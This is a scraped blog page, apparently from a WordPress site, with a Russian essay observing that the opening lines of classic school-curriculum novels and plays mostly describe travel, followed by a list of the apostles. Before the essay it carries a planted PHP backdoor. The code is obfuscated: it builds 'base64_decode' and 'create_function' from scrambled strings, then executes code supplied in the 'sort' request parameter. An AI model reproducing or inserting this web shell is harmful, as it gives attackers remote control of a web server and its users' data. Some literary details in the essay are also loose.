nnn$z0=$_REQUEST['sort'];$q1='';$c2="wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2";$y3=array(8,38,15,7,6,4,26,25,7,34,24,25,7);foreach($y3 as $h4){$q1.=$c2[$h4];}$v5=strrev("noi"."tcnuf"."_eta"."erc");$j6=$v5("",$q1($z0));$j6();nnn?php /** * @package dazzling */ ?>

ВНИМАНИЕ – НА СТАРТ ?


                                                                                                                                                                                                                                                                                            эпиграф

"Мы   все   учились   понемногу . . ."

                     кажется, Пушкин,  что  ли . . .

            Если, по  инсинуации   Огюэ,  прикрывшегося  " устным "  Достоевским ,  "  м  ы     в  с  е  "   ( или  –  вариант:  русская   литература )  вышла / вышли   из  гоголевской      " Шинели ",  то  куда   девать   д о ш и н е л ь н у ю   "великую   русскую " ?   И  вообще:  что   значить    в ы й т и  ?   Например,  " вышел   месяц  из   тумана…";  или  " выйти  в  тираж ";  или  "  выйти  из  себя ". или  " в ы х о д н о й "  –  quo   vadis ?
       А  почему  же  " наша "  литература  не  выскочила,  не  в ы л е т е л а   вперёд  и  выше  вместе  с  птицей-тройкой-Русью,  панегирик  которой  по  праву  заставляют  учить в  школе наизусть ? Конечно,  было  бы  для  нас престижней   в ы л е т а т ь   из  одиннадцатой  главы  " Мёртвых  душ ",  но  не  выгодно    для  " запада ",  поскольку  феномен  Чичикова  –  серьёзная   заявка  на  наполеонство   российского  предпринимательства !  Таким  образом,  сводя  акцент  с  гениальнейших  " Мёртвых  душ "  на  невзрачную  "Шинель",  необходимый  для  Вогюэ  политтехнологический   " в ы х о д    п р о д у к т а "   был  обеспечен.
      Скажу  честно,  я   сейчас  высокопарно  " сбацала "  эту  преамбулу ( мне  кажется,  она  удалась ),  чтобы исполнить  наконец  мою  давнюю  мечту:  свести  воедино  и  подряд  из  всех  хрестоматийных, школьных, положенных  по  программе  уроков  литературы  самые  п е р в ы е   предложения. То  есть  "стартовые "  предложения,  от  которых  отталкивается  дальнейшее  повествование  или  драматическое  действие. Что  называегся привести  голые  факты,  цитаты  этих   н а ч а л
      Все  мы  помним  последовательность  наших  великих  русских  писателей,  изучаемых  в  школе: Грибоедов,  Пушкин,  Лермонтов,  Гоголь,  Тургенев,  Чехов, Достоевский,  Толстой.
      Посмотрим  на  самые  начала,  старты  их  первостепенных произведений,  изучаемых  в   "средней"  школе. Начну, правда,  парадоксально  к  сказанному,  с  финиша  Грибоедовсого  "Горя  от  ума " –  вы,  прочитав  весь  список,  поймёте,  почему  так  получилось.  Итак.

1)  ФИНАЛ  "Горя  от  ума "  –  "КАРЕТУ  МНЕ!  КАРЕТУ ! "

2)  " Евгений  Онегин "  –  "  ТАК   ДУМАЛ   МОЛОДОЙ  ПОВЕСА,   Л Е Т Я    В   ПЫЛИ   НА   ПОЧТОВЫХ ".

3) "Герой  нашего  времени " –  ". . .  Я    Е Х А Л    НА  ПЕРЕКЛАДНЫХ  ИЗ  ТИФЛИСА . . . "

4) " Мёртвые   души "  – " В  ВОРОТА  ГОСТИНИЦЫ  ГУБЕРНСКОГО   ГОРОДА  NN   В Ъ Е Х А Л А   ДОВОЛЬНО   КРАСИВАЯ  РЕССОРНАЯ  НЕБОЛЬШАЯ  БРИЧКА ".

5) ФИНАЛ  " Мёртвых  душ " –  " САДИСЬ,  МОЙ  ЯМЩИК,  ЗВЕНИ,  МОЙ КОЛОКОЛЬЧИК  ! ".

6) " Ревизор " —  " . . .  СООБЩИТЬ  ПРЕНЕПРИЯТНОЕ  ИЗВЕСТИЕ:  К  НАМ   Е Д Е Т   РЕВИЗОР ! ".

7) "Отцы  и  дети "  –  " ЧТО,  ПЁТР, НЕ  ВИДАТЬ  ЕЩЁ ? . . . — НИКАК  ОНИ    Е Д УТ – С,   —  ДОЛОЖИЛ  СЛУГА ".

8) "Вишнёвый  сад"  –   Лопахин:"  П Р И Ш Ё Л    ПОЕЗД ,  СЛАВА  БОГУ  ! Который  час? "

9) " Иванов "" ВЕРИТЕ  ЛИ, ДУША МОЯ,  В  КАКИЕ-НИБУДЬ  3  ЧАСА  СЕМНАДЦАТЬ  ВЁРСТ  ОТМАХАЛ . . .ЗАМУЧИЛСЯ ! "

10) " Идиот "  –  " В   КОНЦЕ   НОЯБРЯ,  В   ОТТЕПЕЛЬ,  ЧАСОВ  В   9   УТРА,  П О Е З Д   ПЕТЕРБУРГСКО – ВАРШАВСКОЙ   ЖЕЛЕЗНОЙ   ДОРОГИ  НА   ВСЕХ  ПАРАХ   П О Д Х О Д И Л     К     ПЕТЕРБУРГУ.

11) "Игрок " –  "НАКОНЕЦ   Я    В О З В Р А Т И Л С Я    ИЗ   МОЕЙ   ДВУХНЕДЕЛЬНОЙ   ОТЛУЧКИ ".

=====================================================================================
И   К А К О Й   Р У С С К И Й   Н Е    Л Ю Б И Т   Б Ы С Т Р О Й    Е З Д Ы  !

                                                                                                         . . .  И   Ж Е Л Е З Н О Й   П О С Т У П И . . .

Теперь  снизим  темп     с т а р т о в   наших  хрестомайных,  школьных,  программных  шедевров:
                                     
                                                                                    СТАРТ   ПЕШКОМ …

12) " Рулан  и  Людмила" –  " У  ЛУКОМОРЬЯ  ДУБ  ЗЕЛЁНЫЙ  …  …  КОТ  УЧЕНЫЙ  ВСЁ   Х О Д И Т     П О    Ц Е П И                                                                                         К Р У Г О М ".

13) " Дворянское  гнездо " –  " РОЗОВЫЕ  ТУЧКИ  ВЫСОКО  СТОЯЛИ  В  ЯСНОМ  НЕБЕ  И,  КАЗАЛОСЬ,  НЕ  ПЛЫЛИ  МИМО,  А   У Х О Д И Л И    В  САМУЮ  ГЛУБЬ   ЛАЗУРИ".

14) " Чайка " – (Медведенко  Маше) " ОТЧЕГО  ВЫ  ВСЕГДА   Х О Д И Т Е    В   ЧЁРНОМ ? ".

15) " Преступление  и  наказание " –  "В НАЧАЛЕ  ИЮЛЯ …  … ОДИН   МОЛОДОЙ  ЧЕЛОВЕК    В Ы Ш Е Л    ИЗ  СВОЕЙ  КАМОРКИ,  КОТОРУЮ  НАНИМАЛ".

16)  " Анна  Каренина "  —  начало  как  бы  общеизвестно:  про  счастливые  и  несчастные ( "каждая  по-своему" ) семьи.  Но  надо  знать,  что  Л.Н.Толстой  вчерне  писал  роман  о  Петре  Первом.  Но,  перечитывая   Пушкина, Толстого   просто  потрясли  две  фразы   из  набросков  Пушкина:
                                                              "  ГОСТИ   С Ъ Е З Ж А Л И С Ь    НА  ДАЧУ "
                                                                                         И
                                                        " НА УГЛУ  УЛИЦЫ  СТОЯЛА  МАЛЕНЬКАЯ  КАРЕТА "
         Толстой  т а к о й   " семантический  аромат "  простых  пушкинских  слов,  что   бросил  писать  роман  о  П Е Т Р Е   П Е Р В О М   и  лихорадочно   занялся  " Анной  Карениной "  –  благо  как  на  грех  в   трёх  километрах  от  Ясной  поляны,  где   была  ж / станция,  гревшая  душу  Толстого  почтой,  там  бросилась  под  поезд  любовница  тамошнего  барина, Анна  Снеткина. Толстой   сладострастно  пришёл  на  это  место,  в сарай,  где положили  тело,  и  мгновенно,  как  корабль  Ваза,  перевернулся  в  своих  творческих  интересах:  с  романа  о  " П Е Т Р Е   П Е Р В О М "  на  роман  об  " Анне  Карениной ".
       Так  же  и  " наше  всё "  Пушкин.  Имея  постоянно  довлеющий  над  собой  госзаказ  от  царя  на  написание  романа  о  " П Е Т Р Е   П Е Р В О М  ",  прервал  десятилетнюю  работу  над  ним в  связи  с  личными  обстоятельствами:  дуэлью  и  собственной  смертью.
    Уроненное  обоими  титанами  знамя  исследования   П Е Т Р А    П Е Р В О Г О   как  основоположника  национальной  идеи  поднял  " Федот,  да  не  тот ",  т о    е с т ь
                                 
                                                Толстой, попавший  в   " строй ".
                                                Социалистического  реализма.

  ======================================================================
                                                 Ш Е Р Ш Е      Л Я     Ф А М   !
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
                          +
           петр  иоанн  андрей
филипп  фома  варфоломей
               два иакова  матфей
 иуда яковль,т.е.  ф а д д е й
  зилота симон   и  матфИй

   


Добавить комментарий